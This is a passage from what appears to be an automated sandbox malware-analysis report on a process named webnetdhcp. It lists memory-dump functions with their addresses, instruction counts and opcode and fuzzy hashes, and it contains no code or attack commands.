                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7712ca9622458f288c4ff9d12b47530c54b787850f72bfe9865087e622482044
                    • Instruction ID: 71955fea54a99babd53abaf2821e939d5ea1804fca256310da4217c7efe2cbff
                    • Opcode Fuzzy Hash: 7712ca9622458f288c4ff9d12b47530c54b787850f72bfe9865087e622482044
                    • Instruction Fuzzy Hash: 0631242290E5968FF7419B68C8659F67BB4EF56310F0841F6E14EC30D2DD1C9989C7D2
                    Function 00007FFAAC784725 Relevance: .1, Instructions: 97COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f90c77470c9966af6552f15c858e7fdc10e85e64d8ffe03a92bb9da3bc617eb
                    • Instruction ID: 1c4850738e0a1f2d7b0a45180ab8ae3019669183a745423f7ccd99efffe627ac
                    • Opcode Fuzzy Hash: 1f90c77470c9966af6552f15c858e7fdc10e85e64d8ffe03a92bb9da3bc617eb
                    • Instruction Fuzzy Hash: 9B31346444F2CA9EEB439B7488705B23FB89F43219B1484EED0DDC6093D958559AC742
                    Function 00007FFAAC493110 Relevance: .1, Instructions: 97COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2bfa2233d244212fa1f079b1303c696ce099889ed7c695f50d3d51689276e2f9
                    • Instruction ID: 3081717696586174c456253073b553e167c9f1adfaaa6da7a0ba9e765656e9b2
                    • Opcode Fuzzy Hash: 2bfa2233d244212fa1f079b1303c696ce099889ed7c695f50d3d51689276e2f9
                    • Instruction Fuzzy Hash: BB31AF70D1A61ACFF764DB68C8196EE77F0AF47308F00857AD409D22D2DA3DA908CB85
                    Function 00007FFAAC493298 Relevance: .1, Instructions: 78COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 377c769a8ae7edf604ca12de57ab99c715872e2ae86462b07f56243c97a72818
                    • Instruction ID: a77e82cd835804575d52f0a9ff0b34d12338fc9d7738e3cd46066748073709f9
                    • Opcode Fuzzy Hash: 377c769a8ae7edf604ca12de57ab99c715872e2ae86462b07f56243c97a72818
                    • Instruction Fuzzy Hash: 0121DA7190952DCFEB54EB98C498AECB7F1FF59305F108139D00EE7295CA39A844CB54
                    Function 00007FFAAC4904F8 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f7b1bbcb13ebd8fa0dcb44ea5098248ccfadd6dcdddb0acf199b1bbff15c979
                    • Instruction ID: 9286d46612397494c3c512586e1b8eb33e033f84e06f83bfa749d8973bb2c9c5
                    • Opcode Fuzzy Hash: 0f7b1bbcb13ebd8fa0dcb44ea5098248ccfadd6dcdddb0acf199b1bbff15c979
                    • Instruction Fuzzy Hash: 7C219030C1969E8FE755EB34C8586AA7BA0FF1A304F0489FAD40DC61A6EA39E558C741
                    Function 00007FFAAC490A01 Relevance: .1, Instructions: 69COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c47422e26126045d9eb5fabeb2f14b324c8d14ac63480dd9b49a39d00e2b2b3
                    • Instruction ID: f9bc074ff5ff1225e1a20b7dce60224c4da8776880a50ae32d0b2dc64ed25493
                    • Opcode Fuzzy Hash: 9c47422e26126045d9eb5fabeb2f14b324c8d14ac63480dd9b49a39d00e2b2b3
                    • Instruction Fuzzy Hash: B4118E6091955E8FF780EBA8C84D5B97BE0FF59354F40C576D81DC20A6EE39A5488780
                    Function 00007FFAAC492708 Relevance: .1, Instructions: 64COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c476a23e271ae8e8f93b56c2c884304ad487fa2f5118cc6ef97cea8678432358
                    • Instruction ID: cdac139dd02fea19c80fb4b15d1c65929e98ab4d37a729556e921c44572e2cfb
                    • Opcode Fuzzy Hash: c476a23e271ae8e8f93b56c2c884304ad487fa2f5118cc6ef97cea8678432358
                    • Instruction Fuzzy Hash: 6A119071C0E78ACFE769DF24C8582A97BA0FF16304F0489FAD40DC6195EA39E558C781
                    Function 00007FFAAC784F51 Relevance: .1, Instructions: 60COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2e9ebf68b16a93c175eb7600416cc119403c9ba2b822c2e136af4675119838f1
                    • Instruction ID: 4fa48b181548dc2894cf819997541e1c3ee2d5c97f960c753e2178b58f9346b0
                    • Opcode Fuzzy Hash: 2e9ebf68b16a93c175eb7600416cc119403c9ba2b822c2e136af4675119838f1
                    • Instruction Fuzzy Hash: 60116D3490864ACFDB85EF28C454ABA7BF0FF19305F4445AEE419C72A2DB74E654CB80
                    Function 00007FFAAC49284D Relevance: .1, Instructions: 60COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 91ba33a1809981d1d4dfa29e5b0a4cf628229abdff1bd48b8f03fca7580350a8
                    • Instruction ID: cf0a6d9b0d1993f25f1a929a188513dad2756b720966cc2e42b9242d50330543
                    • Opcode Fuzzy Hash: 91ba33a1809981d1d4dfa29e5b0a4cf628229abdff1bd48b8f03fca7580350a8
                    • Instruction Fuzzy Hash: 2B118F3084E79A8FE762EB3488595A93FB0EF17300F06C6F7D008C60A3DA2DE4488751
                    Function 00007FFAAC783449 Relevance: .1, Instructions: 55COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 793b2ad7cc0b2bd1a56567ad8a941ad261907377930412db93ab1140d804ddcc
                    • Instruction ID: 06947c2fa99deb3d68ff6b0c35658e3540d8df84f1da593257d7bd2b6dd4b564
                    • Opcode Fuzzy Hash: 793b2ad7cc0b2bd1a56567ad8a941ad261907377930412db93ab1140d804ddcc
                    • Instruction Fuzzy Hash: 9B11607090964E8FEB85EF28C4586BA7BB0FF59305F0085BFD41DC6192DB74A544C780
                    Function 00007FFAAC783799 Relevance: .1, Instructions: 55COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a458378ddb745f10f58bc7a26c3025f34089072adf58784b846737107b33c6fe
                    • Instruction ID: 044ae7c67f5f18ce9e3f96407bf4626ba985897a487f65164ce39a4b804510e5
                    • Opcode Fuzzy Hash: a458378ddb745f10f58bc7a26c3025f34089072adf58784b846737107b33c6fe
                    • Instruction Fuzzy Hash: 09118F7094968E8FEB49EF28C4995B93BB0FF1A304F0185BAD40EC71A6CA35E584C781
                    Function 00007FFAAC4905D8 Relevance: .0, Instructions: 50COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d77db08bc0788db11883ddfd77a624d9c6ac31dfb9ed8e64aaf0be18a0efd9a7
                    • Instruction ID: 469f41cdbba98d9918f1745cca9956d74416b0e6122c9e0e464300dd035f67d1
                    • Opcode Fuzzy Hash: d77db08bc0788db11883ddfd77a624d9c6ac31dfb9ed8e64aaf0be18a0efd9a7
                    • Instruction Fuzzy Hash: 3F018C3094991E8FEB48EF24C048AB977A1FF59308F50C57AD80ED2195CA3AA554CB84
                    Function 00007FFAAC782C6D Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6ea790e51c6a5d980ee0943d46d9c4561a63aa001999c4993fb0d58c97d42cb
                    • Instruction ID: 96d0451e929904dabf8a170b95543f3a02e1aa9d2509ddc42303de7e8ee46fef
                    • Opcode Fuzzy Hash: e6ea790e51c6a5d980ee0943d46d9c4561a63aa001999c4993fb0d58c97d42cb
                    • Instruction Fuzzy Hash: 6601267080950ECFEB84EF24C0596BA37F0FF29305F50857AD40EC2191DA39E594C780
                    Function 00007FFAAC490610 Relevance: .0, Instructions: 42COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eaea006455476572fc18c846845cb7261f86d5e1a6db381fbc3cd06c6d07bc8f
                    • Instruction ID: e35fa5c7fb8a45477b678e5c8f8b0e1057d6ccf76b881e19cf948858f7ed1797
                    • Opcode Fuzzy Hash: eaea006455476572fc18c846845cb7261f86d5e1a6db381fbc3cd06c6d07bc8f
                    • Instruction Fuzzy Hash: CD016D3095991ECFEB58EB34C0486B972A0FF19309F10C9BED40ED21D5DF3AA558C640
                    Function 00007FFAAC490608 Relevance: .0, Instructions: 42COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6c72a5428544897f2c0711c2a08c6d53d5b11e1d1ab08208f5c152a39b6bf687
                    • Instruction ID: d577e52b3c3a357cc0b704c0f9f7dae070ef39ab7b28effeca57edfbe8ca9f86
                    • Opcode Fuzzy Hash: 6c72a5428544897f2c0711c2a08c6d53d5b11e1d1ab08208f5c152a39b6bf687
                    • Instruction Fuzzy Hash: 35016934D5991E9FEB68EB34C4586BA73A0FF19309F1088BEE40ED21D1DE3AA158C640
                    Function 00007FFAAC78388D Relevance: .0, Instructions: 41COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1de06217538819317691ffc27d970f151f57828990921b0a88e7d8e1c75ab0e7
                    • Instruction ID: 4620bc384c2ce60043a3cdea06d956112e620e18f401f3c516f9f3d9d899ee7f
                    • Opcode Fuzzy Hash: 1de06217538819317691ffc27d970f151f57828990921b0a88e7d8e1c75ab0e7
                    • Instruction Fuzzy Hash: 71018F7095A64A9FF751EB3C884D5B97BE0EF1A300F4589B6D50CC7066EE38E2888750
                    Function 00007FFAAC4905D0 Relevance: .0, Instructions: 39COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7d5b17b35803c68ffa266b044137d987c36050d099999a99e818b4381aba0402
                    • Instruction ID: 804959150a8547df962d6dd83d5a7500fd8b0fa46dfb573bbe0ddf427f110b99
                    • Opcode Fuzzy Hash: 7d5b17b35803c68ffa266b044137d987c36050d099999a99e818b4381aba0402
                    • Instruction Fuzzy Hash: C5F0623084A65ECFEB54EF34D4196FA77A4EF16308F50C57AE80ED2191CA3AE554CB84
                    Function 00007FFAAC490FBE Relevance: .0, Instructions: 37COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f526e0dc14e66b982101c46a56b3e574e13cde225dd0a34b53bb6adc6e75773
                    • Instruction ID: 569f317a564a1d34ed3a07941638ac8f0da741ce05a0d7192914988533ad5902
                    • Opcode Fuzzy Hash: 9f526e0dc14e66b982101c46a56b3e574e13cde225dd0a34b53bb6adc6e75773
                    • Instruction Fuzzy Hash: 61018130E0551D8BEB40DB58C884AEEB7B0EF48325F108175D40DE7240EE38A844CF84
                    Function 00007FFAAC491CA8 Relevance: .0, Instructions: 37COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d690abac2de1013303b14196c0c3399aa666e7fe506d77eadfa285294d1652a3
                    • Instruction ID: dd6d7f2d8297638a2a0253f5a433a0b9531ff5921bae3928431434984c5dfd82
                    • Opcode Fuzzy Hash: d690abac2de1013303b14196c0c3399aa666e7fe506d77eadfa285294d1652a3
                    • Instruction Fuzzy Hash: 9CF0C23080A65ECFFB58DF24C4585B93BA0FF56308F408539E80DD2190CA3AD554C780
                    Function 00007FFAAC783F39 Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4c936c031cddcf4946c6a6f48340af2fee273d5ccfb7af763113befc6721fa3b
                    • Instruction ID: 93244d33378907cc6d7fb300573fda2181acac08fc994ab14b55eb264c548a52
                    • Opcode Fuzzy Hash: 4c936c031cddcf4946c6a6f48340af2fee273d5ccfb7af763113befc6721fa3b
                    • Instruction Fuzzy Hash: D3F06D2181F296DBF716535C54110F93B349F03301F4681B7E54DC6082DE18EA8C53D6
                    Function 00007FFAAC4905FA Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 895fdbc0117dc65a8b66e8375658ea22f46d8c017a0b71bab05d7230d0d29f22
                    • Instruction ID: 0ecd766f0306a5a353831e339b8cb1fd0b3f379404c9e6f5baf2a6ea350a2906
                    • Opcode Fuzzy Hash: 895fdbc0117dc65a8b66e8375658ea22f46d8c017a0b71bab05d7230d0d29f22
                    • Instruction Fuzzy Hash: 5CF0B434D5E65ECFFB289B34C8591BA7760FF06308F00C9BAE41EC11D1EA39A158C681
                    Function 00007FFAAC4927DD Relevance: .0, Instructions: 34COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9ded08a8edc3fb4c734d2cc8673590ad33802801aae82b91e804eb242c9d5921
                    • Instruction ID: 8b581e7643d260fd8221002ad24bf102daa7238ff172609b8f5a55889211177f
                    • Opcode Fuzzy Hash: 9ded08a8edc3fb4c734d2cc8673590ad33802801aae82b91e804eb242c9d5921
                    • Instruction Fuzzy Hash: 7FF0627180E789CFEB69DB2488595A93BA0BF56209F4086BEE40DC51D2DB29D458C741
                    Function 00007FFAAC78322F Relevance: .0, Instructions: 30COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 73ec320ab9bf02b9cd1c91cc816ed8ffd17bcb31a2a43be471e74097600e1a6f
                    • Instruction ID: aa5d1540aee080f7cf5f5517d8f876aad59f69eb0a4ee794d83bbbd7e7d3b9ea
                    • Opcode Fuzzy Hash: 73ec320ab9bf02b9cd1c91cc816ed8ffd17bcb31a2a43be471e74097600e1a6f
                    • Instruction Fuzzy Hash: C8F0797091952D8FEB90EF64C8497AD77B1FF59304F5081A5940DD3292CA38A9848F95

                    Non-executed Functions

                    Function 00007FFAAC780921 Relevance: 5.1, Strings: 4, Instructions: 59COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID: "$0$5$W
                    • API String ID: 0-4047843982
                    • Opcode ID: 533c4daf156ceb113325a784b1c9bcc1420f6eca4917c7800f26d4c0613cdd73
                    • Instruction ID: 87fb78df8fe820e32c11aec1de45d2cac639decead1242a4f3c06f3835899b34
                    • Opcode Fuzzy Hash: 533c4daf156ceb113325a784b1c9bcc1420f6eca4917c7800f26d4c0613cdd73
                    • Instruction Fuzzy Hash: B421C974D0562ACBFB68CF04C894BFDB7B1AB55305F5081AAC10DA7290CA796AC5CF94